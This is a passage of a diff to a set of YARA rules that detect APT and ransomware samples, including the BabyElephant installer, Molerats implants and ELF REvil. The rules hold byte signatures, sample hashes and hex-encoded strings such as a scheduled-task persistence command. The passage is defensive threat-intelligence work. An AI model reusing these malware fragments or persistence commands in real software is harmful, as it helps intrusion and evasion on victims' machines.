0f 57 c0 0f 11 44 24 30 48 8d 05 41 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d d2 05 45 00 00 0f 85 18 03 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ab 40 00 48 89 15 fb ab 40 00 83 3d 64 05 45 00 00 0f 1f 40 00 0f 85 95 02 00 00 48 89 05 d3 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 65 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d f2 04 45 00 00 0f 85 16 02 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a aa 40 00 48 89 15 5b aa 40 00 83 3d 84 04 45 00 00 0f 1f 40 00 0f 85 90 01 00 00 48 89 05 33 aa 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 89 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 12 04 45 00 00 0f 85 11 01 00 00 48 89 05 05 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da a9 40 00 48 89 15 db a9 40 00 83 3d a4 03 45 00 00 0f 1f 40 00 0f 85 89 00 00 00 48 89 05 b3 a9 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ad 5d 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f2 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 32 03 45 00 00 }
+		$seq2 = { 48 c7 40 70 00 00 00 00 48 8b 48 08 48 89 0c 24 e8 01 47 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 70 e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 9b 6d ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 4a e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 75 6d ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 41 4e fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 9c 17 00 00 0f 57 c0 0f 11 84 24 18 02 00 00 0f 11 84 24 28 02 00 00 0f 11 84 24 38 02 00 00 48 8b 84 24 b8 04 00 00 48 8b 88 b0 00 00 00 48 8b 11 48 8b 59 08 48 8b 49 10 48 89 94 24 30 02 00 00 48 89 9c 24 38 02 00 00 48 89 8c 24 40 02 00 00 48 8d 8c 24 18 02 00 00 48 89 0c 24 e8 2d a2 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 90 e8 7b e0 00 00 48 8d 84 24 18 02 00 00 48 89 04 24 e8 0a a2 ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 76 4d fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 66 0f 1f 44 00 00 0f 85 ab 16 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 80 79 53 00 0f 85 a9 15 00 00 48 8b 48 18 48 8b 51 20 48 8b 0a 48 8b 9c 24 80 01 00 00 0f b7 73 40 66 89 34 24 ff d1 48 8b 44 24 08 48 89 84 24 f8 00 00 00 48 8b 4c 24 10 48 89 8c 24 38 01 00 00 48 8b 58 20 48 8b b4 24 80 01 00 00 48 8b 7e 48 4c 8b 84 24 b8 04 00 00 4d 8b 88 b0 00 00 00 4d 8b 50 08 4d 8b 58 10 48 89 0c 24 48 89 7c 24 08 4c 89 4c 24 10 4c 89 54 24 18 4c 89 5c 24 20 ff d3 48 8b 44 24 28 48 8b 4c 24 30 48 8b 5c 24 38 48 83 7c 24 30 00 0f 85 c0 14 00 00 48 85 c0 0f 84 93 00 00 00 48 89 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 7b 13 00 00 48 8b 84 24 c0 01 00 00 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 48 89 5c 24 18 e8 2c df 00 00 48 8b 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 21 12 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 c6 44 24 08 16 48 89 4c 24 10 48 89 54 24 18 48 89 5c 24 20 e8 2b 4c fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 c6 11 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 90 0f 8d 0b 10 00 00 31 c9 48 89 8c 24 78 01 00 00 48 8d 05 e9 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 4e cd e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 c0 01 00 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 04 00 00 00 48 c7 44 24 18 04 00 00 00 0f 1f 00 e8 5b de 00 00 48 8d 05 94 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 f9 cc e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 80 01 00 00 48 89 0c 24 c6 44 24 08 16 48 89 44 24 10 48 c7 44 24 18 04 00 00 00 48 c7 44 24 20 04 00 00 00 e8 44 4b fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 1f 0f 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 66 90 e8 bb 43 fe ff 48 8b 44 24 10 48 8b 4c 24 18 48 83 7c 24 10 00 0f 85 d6 0e 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 e8 34 4c fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 10 48 8b 5c 24 10 48 8b 74 24 08 48 8b 7c 24 08 48 83 7c 24 18 00 0f 85 7b 0e 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 0f 8c 55 0e 00 00 48 8d 0d e9 3f 26 00 66 0f 1f 84 00 00 00 00 00 48 39 cf 0f 85 30 0e 00 00 48 89 94 24 b8 01 00 00 0f 85 4f 0d 00 00 48 89 14 24 0f 1f 44 00 00 e8 db 9e ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 2a dd 00 00 48 c7 84 24 80 03 00 00 00 00 00 00 48 8d bc 24 88 03 00 00 0f 57 c0 48 8d 7f f0 66 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 de c6 e4 ff 48 8b 6d 00 48 8b 84 24 b8 01 00 00 48 8b 48 18 48 8b 50 20 48 8b 58 28 48 89 8c 24 80 03 00 00 48 89 94 24 88 03 00 00 48 89 9c 24 90 03 00 00 48 8b 8c 24 80 01 00 00 48 89 0c 24 48 8b 94 24 80 03 00 00 48 89 54 24 08 48 8d 7c 24 10 48 8d b4 24 88 03 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 ca c9 e4 ff 48 8b 6d 00 e8 43 27 00 00 48 8b 84 24 80 00 00 00 48 8b 8c 24 88 00 00 00 48 83 bc 24 80 00 00 00 00 0f 85 4a 0c 00 00 48 8b 94 24 b8 01 00 00 48 83 7a 20 00 0f 84 26 0c 00 00 48 8b 94 24 80 01 00 00 48 8b 8a 98 00 00 00 48 8b 9a 90 00 00 00 48 85 c9 0f 86 7e 13 00 00 48 8b 03 48 8b 88 a0 00 00 00 48 8b 80 a8 00 00 00 48 89 8c 24 f0 00 00 00 48 89 84 24 20 01 00 00 48 89 14 24 e8 88 4a fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 08 48 8b 5c 24 10 48 83 7c 24 18 00 0f 85 9d 0b 00 00 48 8b 84 24 f0 00 00 00 48 8b 8c 24 20 01 00 00 48 89 94 24 00 01 00 00 48 89 8c 24 20 01 00 00 48 89 84 24 f0 00 00 00 48 89 9c 24 40 01 00 00 48 8b b4 24 80 01 00 00 48 8b 7e 48 48 83 }
+		$seq3 = { 48 89 34 24 e8 65 6c fe ff 48 8d bc 24 f8 03 00 00 48 8d 74 24 08 48 89 6c 24 f0 48 8d 6c 24 f0 e8 2f be e4 ff 48 8b 6d 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 8b 51 58 48 8b 0a 48 89 e7 48 8d b4 24 f8 03 00 00 0f 1f 80 00 00 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f7 bd e4 ff 48 8b 6d 00 ff d1 48 8b 84 24 b0 00 00 00 48 8b 8c 24 b8 00 00 00 48 83 bc 24 b0 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 2 of ( $seq* ) and 7 of ( $str* )
 }
-rule ARKBIRD_SOLG_MAL_Boombox_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Babyelephant_Installer_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect BoomBox malware"
+		description = "Detect Installer from BabyElephant APT"
 		author = "Arkbird_SOLG"
-		id = "b2629c5b-1fb0-5ea1-8661-faf8f1d6b578"
-		date = "2021-05-28"
-		modified = "2021-06-05"
+		id = "c89a127d-af49-597e-927d-c9a10c90fabe"
+		date = "2021-02-23"
+		modified = "2021-02-23"
+		reference = "https://twitter.com/h2jazi/status/1363683531067715584"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/BabyElephant/APT_BabyElephant_Installer_Feb_2021_1.yar#L1-L21"
+		license_url = "N/A"
+		logic_hash = "7c4f2cd7e56426e42141b1f2f3a13e1daa01b1de1fe88f4bd135601234407ec9"
+		score = 50
+		quality = 73
+		tags = "FILE"
+		level = "experimental"
+		hash1 = "d55ff954abb04ec29745f7d80ea7457a862c8025a21e889f1ba44c32ba486a7e"
+
+	strings:
+		$s1 = { 65 63 68 6f 20 25 64 20 3e 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c }
+		$s2 = "COMSPEC" fullword ascii
+		$s3 = { 53 43 48 54 41 53 4b 53 20 2f 43 52 45 41 54 45 20 2f 53 43 20 4d 49 4e 55 54 45 20 2f 4d 4f 20 [1-3] 20 2f 54 4e 20 22 [1-12] 22 20 2f 54 52 20 22 [4-24] 22 20 2f 66 }
+		$s4 = "%s//%s" fullword ascii
+		$s5 = { 53 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 54 4e 20 22 [1-12] 22 20 2f 66 }
+		$s6 = { 83 c4 10 8b d8 e8 13 02 00 00 83 fb ff 74 06 89 38 8b f3 eb 34 83 38 02 74 0f e8 fe 01 00 00 83 38 0d 74 05 83 ce ff eb 20 e8 ef 01 00 00 89 38 56 8d 45 ec b9 c4 3e 42 00 50 51 56 89 4d ec }
+		$s7 = { 68 00 08 00 00 8d 85 48 f6 ff ff 6a 00 50 e8 00 33 00 00 83 c4 0c 8d 85 48 f6 ff ff 6a 00 68 00 08 00 00 50 53 ff d6 85 c0 0f 8e 1f 03 00 00 0f 1f 40 00 6a 08 68 e0 b3 42 00 8d 8d 28 ec ff ff c7 85 38 ec ff ff 00 00 00 00 c7 85 3c ec ff ff 0f 00 00 00 c6 85 28 ec ff ff 00 e8 a3 09 00 00 8d 95 28 ec ff ff c7 45 fc 00 00 00 00 8d 8d 10 ec ff ff e8 2b 05 00 00 83 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of them
+}
+rule ARKBIRD_SOLG_APT_Molerats_Feb_2021_1 : FILE
+{
+	meta:
+		description = "Detect Molerats implants"
+		author = "Arkbird_SOLG"
+		id = "8ede3aa9-9788-52a5-91a7-bb160daad5ba"
+		date = "2021-02-27"
+		modified = "2021-03-01"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_BoomBox_May_2021_1.yara#L1-L18"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-28/Molerats/APT_Molerats_Feb_2021_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "b88848ead9c992392c99e88a25541b72d825fbd32c3eb83fefc18e7cfbd08cc8"
+		logic_hash = "fbd98f088019434f736107dfe62a307e2c57d0288d68f3133a13de59bf318aea"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
-		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
-		tlp = "White"
-		adversary = "NOBELIUM"
+		hash1 = "0a55551ade55705d4be6e946ab58a26d7cf8087558894af8799931b09d38f3bc"
+		hash2 = "c9d7b5d06cd8ab1a01bf0c5bf41ef2a388e41b4c66b1728494f86ed255a95d48"
 
 	strings:
-		$s1 = { 13 30 06 00 90 01 00 00 07 00 00 11 1f 1a 28 53 00 00 0a 25 72 bc 05 00 70 28 1e 00 00 0a 0a 06 28 54 00 00 0a 2d 07 06 28 55 00 00 0a 26 72 ea 05 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 22 07 28 55 00 00 0a 26 07 72 12 06 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 07 07 28 55 00 00 0a 26 73 08 00 00 06 25 7e 08 00 00 04 72 1c 06 00 70 6f 06 00 00 06 0c 08 2c 46 08 8e 69 1f 11 59 8d 2b 00 00 01 13 04 08 1f 0a 11 04 16 11 04 8e 69 28 56 00 00 0a 73 05 00 00 06 11 04 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 05 06 72 3c 06 00 70 28 1e 00 00 0a 11 05 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 46 7e 59 00 00 0a 72 64 06 00 70 17 6f 5a 00 00 0a 13 06 11 06 72 c0 06 00 70 6f 5b 00 00 0a 2d 26 11 06 72 c0 06 00 70 72 e8 06 00 70 06 72 3c 06 00 70 28 1e 00 00 0a 72 12 07 00 70 28 5c 00 00 0a 6f 5d 00 00 0a 7e 08 00 00 04 72 38 07 00 70 6f 06 00 00 06 0d 09 2c 46 09 8e 69 1f 11 59 8d 2b 00 00 01 13 07 09 1f 0a 11 07 16 11 07 8e 69 28 56 00 00 0a 73 05 00 00 06 11 07 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 08 07 72 58 07 00 70 28 1e 00 00 0a 11 08 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 16 72 84 07 00 70 06 72 9e 07 00 70 28 1e 00 00 0a 28 5e 00 00 0a 26 2a }
-		$s2 = { 13 30 05 00 11 01 00 00 05 00 00 11 02 7b 02 00 00 04 72 0b 03 00 70 28 1e 00 00 0a 28 30 00 00 0a 74 2d 00 00 01 25 20 c0 d4 01 00 6f 31 00 00 0a 25 72 86 01 00 70 6f 32 00 00 0a 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 8d 02 00 70 03 28 1e 00 00 0a 6f 36 00 00 0a 25 72 2b 03 00 70 6f 3f 00 00 0a 72 9d 02 00 70 04 72 5d 03 00 70 28 37 00 00 0a 0a 25 6f 35 00 00 0a 72 bb 02 00 70 06 6f 38 00 00 0a 25 6f 40 00 00 0a 05 16 05 8e 69 6f 2e 00 00 0a 6f 39 00 00 0a 74 1a 00 00 01 0b 07 6f 3a 00 00 0a 20 c8 00 00 00 33 64 07 6f 3e 00 00 0a 73 41 00 00 0a 6f 42 00 00 0a 0c 02 7b 06 00 00 04 08 6f 43 00 00 0a 6f 44 00 00 0a 17 6f 45 00 00 0a 6f 46 00 00 0a 72 02 04 00 70 28 47 00 00 0a 2c 29 02 7b 03 00 00 04 08 6f 43 00 00 0a 26 02 7b 04 00 00 04 08 6f 43 00 00 0a 26 02 7b 05 00 00 04 08 6f 43 00 00 0a 26 17 2a 16 2a 16 2a }
-		$s3 = { 13 30 04 00 6d 01 00 00 0a 00 00 11 72 f2 07 00 70 28 54 00 00 0a 39 5d 01 00 00 72 [2] 00 70 72 f2 07 00 70 28 5e 00 00 0a 26 1f 1a 28 53 00 00 0a 72 ?? 08 00 70 28 1e 00 00 0a 28 58 00 00 0a 3a 32 01 00 00 1f 0a 8d 2b 00 00 01 25 d0 0c 00 00 04 28 67 00 00 0a 0a 1d 8d 2b 00 00 01 25 d0 0b 00 00 04 28 67 00 00 0a 0b 28 4b 00 00 0a 6f 4c 00 00 0a 28 0c 00 00 06 26 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 0c 00 00 06 0c 73 0a 00 00 06 6f 09 00 00 06 0d 09 2c 56 28 68 00 00 0a 09 6f 61 00 00 0a 13 05 73 05 00 00 06 11 05 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 06 06 11 06 28 0d 00 00 06 13 07 11 07 07 28 0d 00 00 06 13 07 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 07 6f 07 00 00 06 26 28 0b 00 00 06 28 4b 00 00 0a 6f 4c 00 00 0a 13 04 11 04 72 d5 00 00 70 28 69 00 00 0a 2c 65 73 02 00 00 06 11 04 6f 01 00 00 06 13 08 11 08 2c 53 73 05 00 00 06 28 68 00 00 0a 11 08 6f 61 00 00 0a 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 09 06 11 09 28 0d 00 00 06 13 0a 11 0a 07 28 0d 00 00 06 13 0a 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 0a 6f 07 00 00 06 26 2a }
-		$s4 = { 1b 30 05 00 b5 00 00 00 06 00 00 11 72 76 05 00 70 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 10 00 00 0a 0a 72 84 05 00 70 28 4b 00 00 0a 6f 4c 00 00 0a 28 10 00 00 0a 0b 72 90 05 00 70 0c 28 4d 00 00 0a 28 49 00 00 0a 6f 4e 00 00 0a 13 04 16 13 05 2b 2a 11 04 11 05 9a 13 06 11 06 6f 4f 00 00 0a 18 33 13 08 11 06 6f 50 00 00 0a 72 98 05 00 70 28 37 00 00 0a 0c 11 05 17 58 13 05 11 05 11 04 8e 69 32 ce 28 51 00 00 0a 6f 52 00 00 0a 0d 72 9c 05 00 70 1a 8d 10 00 00 01 25 16 06 a2 25 17 07 a2 25 18 08 a2 25 19 09 a2 28 1d 00 00 0a 13 07 de 06 26 14 13 07 de 00 11 07 2a 00 00 00 01 10 00 00 00 00 00 00 ac ac 00 06 10 00 00 01 }
+		$seq1 = { 55 8b ec 81 c4 60 fc ff ff 53 33 d2 89 95 60 fc ff ff 89 45 fc 33 c0 55 68 [1-3] 00 64 ff 30 64 89 20 8b 45 fc 83 78 44 00 0f 85 5d 01 00 00 b2 01 a1 [2] 44 00 e8 [3] ff 8b 55 fc 89 42 44 8b 45 fc 83 c0 48 e8 [3] ff 8d 85 ec fe ff ff 50 6a 40 e8 [3] ff 48 85 c0 0f 8c 18 01 00 00 40 89 45 f0 8d 85 ec fe ff ff 89 45 ec 8b 45 ec 8b 00 e8 35 ?? f5 ff 84 c0 0f 84 ec 00 00 00 8d 45 f4 50 68 19 00 02 00 6a 00 6a 00 8b 45 ec 0f b7 00 89 85 64 fc ff ff c6 85 68 fc ff ff 00 8d 8d 64 fc ff ff ba [3] 00 8d 85 6c fc ff ff e8 [3] ff 50 68 02 00 00 80 e8 [3] ff 85 c0 0f 85 a3 00 00 00 33 c0 55 68 [3] 00 64 ff 30 64 89 20 c7 45 f8 00 02 00 00 8d 45 f8 50 8d 85 ec fc ff ff 50 6a 00 6a 00 68 [3] 00 8b 45 f4 50 e8 [3] ff 85 c0 75 4f 8d 85 60 fc ff ff 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 8b 95 60 fc ff ff 8b 45 ec 8b 08 8b 45 fc 8b 40 44 8b 18 ff 53 40 8b 45 ec 8b 00 8b 55 fc 3b 42 4c 75 16 8b 45 fc 83 c0 48 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 33 c0 5a 59 59 64 89 10 68 [3] 00 8b 45 f4 50 e8 [3] ff }
+		$seq2 = { 55 8b ec 81 c4 e4 fd ff ff 53 8b da 89 45 fc 8b 45 fc e8 [2] ff ff 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 83 7d fc 00 75 15 68 05 01 00 00 8d 85 e6 fd ff ff 50 6a 00 e8 [2] ff ff eb 1a 8b 45 fc e8 [2] ff ff 8b c8 8d 85 e6 fd ff ff ba 05 01 00 00 e8 da f7 ff ff 66 83 bd e6 fd ff ff 00 0f 84 a7 01 00 00 33 c0 89 45 f8 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 84 9a 00 00 00 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 02 00 00 80 e8 2b 5e ff ff 85 c0 74 7c 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 01 00 00 80 e8 0d 5e ff ff 85 c0 74 5e 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 02 00 00 80 e8 [2] ff ff 85 c0 74 40 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 74 22 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 85 e6 00 00 00 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 8d 85 e6 fd ff ff ba 05 01 00 00 e8 c9 fc ff ff 8d 45 f0 50 6a 00 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 85 c0 75 33 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff eb 4b 8d 45 f0 50 6a 00 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 85 c0 75 2f 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff 33 c0 5a 59 59 64 89 10 68 [2] 40 00 83 7d f8 00 74 08 8b 45 f8 e8 [2] ff ff 8b 45 f4 50 e8 [2] ff ff }
+		$seq3 = { d1 f8 79 03 83 d0 00 03 45 80 89 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 10 01 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 04 29 45 d0 8b 75 8c 2b 75 d4 83 ee 02 8b 45 a4 8b 80 e4 02 00 00 2b 70 08 8b 45 a4 8b 80 e4 02 00 00 2b 70 0c 89 75 8c 6a 00 56 8b 45 d0 50 8b 45 ec e8 [2] fb ff 50 57 8b 85 68 ff ff ff 50 e8 [2] fc ff 84 db 0f 84 0d 03 00 00 a1 [3] 00 8b 00 e8 [2] 09 00 50 8b 45 b4 50 6a 23 e8 [3] ff 89 45 d8 8b 45 d8 01 45 90 83 45 94 0f 83 45 90 05 8b 45 f0 8b 40 08 8b 50 74 }
+		$s1 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword wide
+		$s2 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
+		$s3 = { 45 00 72 00 72 00 6f 00 72 00 20 00 6f 00 70 00 65 00 6e 00 69 00 6e 00 67 00 20 00 72 00 65 00 71 00 75 00 65 00 73 00 74 00 3a 00 20 00 28 00 25 00 64 00 29 00 20 00 25 00 73 }
+		$s4 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 66 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 2e 00 20 00 25 00 73 }
+		$s5 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 63 00 6c 00 69 00 70 00 62 00 6f 00 61 00 72 00 64 00 3a 00 20 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and 2 of ( $seq* ) and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Enc_Payload_May_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Revil_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect encrypted payload, must be with others APT29 rules maybe give lot fake postives due to the pdf header"
+		description = "Detect the ELF version of REvil ransomware"
 		author = "Arkbird_SOLG"
-		id = "34da1d06-7892-59ec-8b11-c3278a7f2e34"
-		date = "2021-05-28"
-		modified = "2021-06-02"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_Enc_payload_May_2021_1.yara#L1-L17"
+		id = "b4b9d60e-a352-5045-8be3-e9a08d70ef6b"
+		date = "2021-06-28"
+		modified = "2021-06-29"
+		reference = "https://twitter.com/jaimeblascob/status/1409603887871500288"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-28/REvil/RAN_ELF_REvil_Jun_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "484d9947d8acd32126cdc3e3f671cd3b3b048bbdb608d5573f6fcc7e4ddf13f8"
-		score = 50
+		logic_hash = "054bdb8362fdea2dc914b11387f6c67e35932acb73ba2b133ca29f69549914ba"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f"
-		hash2 = "656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb"
-		level = "Experimental"
+		hash1 = "3d375d0ead2b63168de86ca2649360d9dcff75b3e0ffa2cf1e50816ec92b3b7d"
+		hash2 = "d6762eff16452434ac1acc127f082906cc1ae5b0ff026d0d4fe725711db47763"
+		hash3 = "796800face046765bd79f267c56a6c93ee2800b76d7f38ad96e5acb92599fcd4"
+		hash4 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4"
 		tlp = "White"
-		adversary = "NOBELIUM"
+		adversary = "RAAS"
 
 	strings:
